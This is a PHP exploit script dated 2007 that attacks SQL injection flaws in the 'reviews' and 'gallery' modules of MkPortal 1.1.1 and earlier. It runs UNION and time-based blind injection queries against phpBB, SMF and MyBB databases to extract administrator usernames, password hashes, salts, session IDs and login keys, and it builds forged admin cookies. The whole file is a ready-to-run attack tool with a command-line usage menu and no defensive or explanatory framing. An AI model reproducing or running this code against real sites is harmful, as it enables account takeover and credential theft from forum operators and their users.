mkportal-sql.txt
Posted on 13 July 2007
<?php /* [i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit [i] Vulnerable versions: MkPortal <= 1.1.1 [i] Bug discovered by: Coloss [i] Exploit by: Coloss [i] Date: 06.07.2007 [i] This is priv8 not for kids [Notes] At this time MkPortal 1.1.1 is the latest stable release Currently implemented: phpbb, smf and mybb */ $exptime = 3600; $stcnt = 300000; $maxnull = 5; $opts = getopt("u:U:P:f:m:d:o:"); $vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2", "phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1", "smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1", "mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1", ); print "[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit [i] Vulnerable versions: MkPortal <= 1.1.1 [i] Bug discovered by: Coloss [i] Exploit by: Coloss [i] Date: 06.07.2007 [i] This is priv8 not for kids "; if ($opts[u] == '') die(help($argv[0])); if (!strncmp($opts[u], "http", 4)) $url = $opts[u]; else $url = "http://".$opts[u]; if ($opts[U]) $user = $opts[U]; if ($opts[P]) $pass = $opts[P]; if ($opts[f]) $forum = $opts[f]; if ($opts[m]) $met = $opts[m]; if ($opts[o]) $file = $opts[o]; if ($opts[d]) $dir = $opts[d]; $cookies = ''; $delay = $min = $max = $mid = 0; $fld1 = $fld2 = ''; if (!$forum) die("[X] You haven't specified any forum type! "); echo "[+] Target: $url [$forum] "; exploit(); function exploit_gallery ($f) { global $cookies, $url, $fld1, $fld2; $sql = get_sql($f); $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; $req = sprintf($sql, $str); $u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req); $html = Send($u, NULL, $cookies); if (strstr($html, "ERROR: Database error")) die("[X] SQL Query Error.. probably wrong table prefix "); else if (strstr($html, "<title>Error</title>")) die("[X] This method failed. Try something else "); $var1 = get_string($html,"name="titolo" value="","""); $var2 = get_string($html,"name="descrizione" class="bgselect">","<"); return ($var1." ".$var2); } function get_delay ($cnt, $f, $u) { global $url, $cookies, $fld1, $fld2, $met; $sql = get_sql($f); if (strstr($met, "gallery")) $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; else $str = $fld1; $inj = sprintf($sql, $str); if (strstr($inj, "ORDER BY")) { list($base, $order) = explode("ORDER BY", $inj); $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order; } else $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))"; $req = sprintf($inj, $fld1, 1, "=1", $cnt); $u .= urlencode($req); $start = getmicrotime(); Send($u, NULL, $cookies); $end = getmicrotime(); $delay = intval(10 * ($end - $start)); return $delay; } function get_normaldelay ($f, $u) { global $stcnt; $na = get_delay(1,$f,$u); $da = get_delay($stcnt,$f,$u); $nb = get_delay(1,$f,$u); $db = get_delay($stcnt,$f,$u); $nc = get_delay(1,$f,$u); $dc = get_delay($stcnt,$f,$u); $mean_delayed = intval(($da + $db + $dc) / 3); if ($mean_delayed < 2) die("Failed. The Answer was too rapid, probably you have not enough privileges "); return $mean_delayed; } function exploit_blind ($sql, $u, $field) { global $cookies, $stcnt, $delay, $min, $max, $mid; $cnt = $stcnt * 4; echo "[->] Trying to find value for '".$field."' "; for ($i = 1; $i < 51; $i++) { for ($j = $min; $j <= $max; $j++) { if ($j == $mid) $j = 97; $req = sprintf($sql, $field, $i, "=$j", $cnt); $ur = $u.urlencode($req); $start = getmicrotime(); Send($ur, NULL, $cookies); $end = getmicrotime(); $dtime = intval(10 * ($end - $start)); if ($dtime > ($delay * 2)) { $out .= chr($j); echo "[+] Current value for '".$field."' (".$i."): ".$out." "; break; } if ($j == $max) $i = 41; } } if ($out) echo " [->] Found value for '".$field."': ".$out." "; return $out; } function exploit_gallery_blind ($f) { global $fld1, $fld2, $url; $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; $sql = get_sql($f); $inj = sprintf($sql, $str); $u = $url."index.php?ind=gallery&op=edit_file&iden="; $var1 = exploit_init_blind($f, $u, $inj, $fld1); $var2 = exploit_init_blind($f, $u, $inj, $fld2); return ($var1." ".$var2); } function exploit_reviews ($f) { global $fld1, $fld2, $url; $u = $url."index.php?ind=reviews&op=update_file&iden="; $sql = get_sql($f); $inj = sprintf($sql, $fld1); $var1 = exploit_init_blind($f, $u, $inj, $fld1); $inj = sprintf($sql, $fld2); $var2 = exploit_init_blind($f, $u, $inj, $fld2); return ($var1." ".$var2); } function exploit_init_blind ($f, $u, $inj, $field) { global $cookies, $delay, $fld1, $fld2, $mid; if (strstr($inj, "ORDER BY")) { list($base, $order) = explode("ORDER BY", $inj); if ($mid == 58) $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order; else $inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order; } else { if ($mid == 58) $inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)"; else $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)"; } echo "[->] Starting blind sql injection! "; echo "[+] Getting standard response delay... "; $delay = get_normaldelay($f,$u); echo $delay."ds "; $var = exploit_blind($inj, $u, $field); if (strstr($f, "sid") && !$var) die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later. "); return $var; } function get_data ($f) { global $met; switch ($met) { case 'reviews': $res = exploit_reviews($f); break; case 'gallery-blind': $res = exploit_gallery_blind($f); break; case 'gallery': $res = exploit_gallery($f); break; default: die("[X] Invalid exploit method specified "); } return $res; } function phpbb_exploit () { global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."login.php?login=true"; $post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode(" ", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && strstr($line, "sid")) { $cookies = get_string($line, "Set-Cookie: ", ";"); $c++; } } if (!$cookies || $c < 2) die("Failed "); echo "Successfull "; } $fld1 = "username"; $fld2 = "user_password"; $min = 48; $max = 122; $mid = 58; $res = get_data($forum); list($auesr, $apwd) = explode(" ", $res); if ($auser && strlen($apwd) == 32) { owrite(" [+] Target: $url [$forum] "); owrite("[->] Found admin username: '".$auser."' "); owrite("[->] Found admin hash password: '".$apwd."' "); } else die("[X] Failed to retrive informations "); $fld1 = "session_id"; $fld2 = "session_time"; $max = 102; $res = get_data($forum."_sid"); list($sid,$start) = explode(" ", $res); if ($sid && strlen($sid) == 32) { $t = (int) (time() - $start - $exptime); if ($t >= 0) echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore "; else owrite("[->] Found admin sid: '".$sid."' valid for ~".abs($t)."s "); } else echo "[!] No admin sid was found "; } function smf_exploit () { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max; $base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}'; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."index.php?action=login2"; $post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode(" ", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID")) $cookies = get_string($line, "Set-Cookie: ", ";"); } if (!$cookies) die("Failed "); echo "Successfull "; } $fld1 = "passwd"; $fld2 = "passwordSalt"; $min = 48; $max = 102; $mid = 58; $res = get_data($forum); list($pwd,$salt) = explode(" ", $res); if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) { $pass = $pwd.$salt; $pass = sha1($pass); $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite(" [+] Target: $url [$forum] "); owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."' "); } else die("[X] Failed to retrive informations "); } function mybb_exploit () { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."member.php"; $post = "username=".$user."&password=".$pass."&action=do_login&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode(" ", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line, " sid=")) { $cookies = get_string($line, "Set-Cookie: ", ";"); } } if (!$cookies) die("Failed "); echo "Successfull "; } $fld1 = "loginkey"; $fld2 = "username"; $min = 48; $max = 122; $mid = 91; $res = get_data($forum); list($key,$auser) = explode(" ", $res); if ($key && strlen($key) == 50) { $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite(" [+] Target: $url [$forum] "); owrite("[+] Found admin cookie '".$cname."': '1_".$key."' "); } else die("[X] Failed to retrive informations "); $fld1 = "password"; $fld2 = "salt"; $res = get_data($forum); list($apwd,$salt) = explode(" ", $res); if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) { owrite("[+] Found admin hash password: '".$apwd."' "); owrite("[+] Found admin password salt: '".$salt."' "); } else echo "[!] No admin sid was found "; } function exploit () { global $forum; switch ($forum) { case 'phpbb': phpbb_exploit(); break; case 'smf': smf_exploit(); break; case 'mybb': mybb_exploit(); break; default: die("Failed. Cannot handle this type of forum "); } } function get_string ($str, $start, $end) { $res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str, $start)+strlen($start),strlen($str)), $end)); return $res; } function get_sql ($var) { global $vars; for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) { if ($vars[$i] == $var) return $vars[$j]; } } function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } function Send($url, $post_fields='', $cookie = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); if ($post_fields) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'); if(!empty($cookie)) curl_setopt ($ch, CURLOPT_COOKIE, $cookie); if($headers === TRUE) curl_setopt ($ch, CURLOPT_HEADER, TRUE); else curl_setopt ($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $fc = curl_exec($ch); curl_close($ch); return $fc; } function owrite ($msg) { global $file, $debug; echo $msg; if ($file) { if (!($h = fopen($file, 'ab')) && $debug) { echo "[X] Cannot open '$file' "; return; } if (fwrite($h, $msg) === FALSE && $debug) echo "[X] Cannot write to '$file' "; fclose($h); } } function help ($prog) { print "[-] Usage: $prog -u <url> -> Sets Target url [-U] <user> -> Your username [-P] <hash> -> Your password [-f] <type> -> Sets Forum type (phpbb, smf or mybb) [-m] <method> -> Which method do you want to use (gallery or reviews) [-d] <dir> -> Sets forum subdirectory [-o] <file> -> Writes results to a file "; } ?>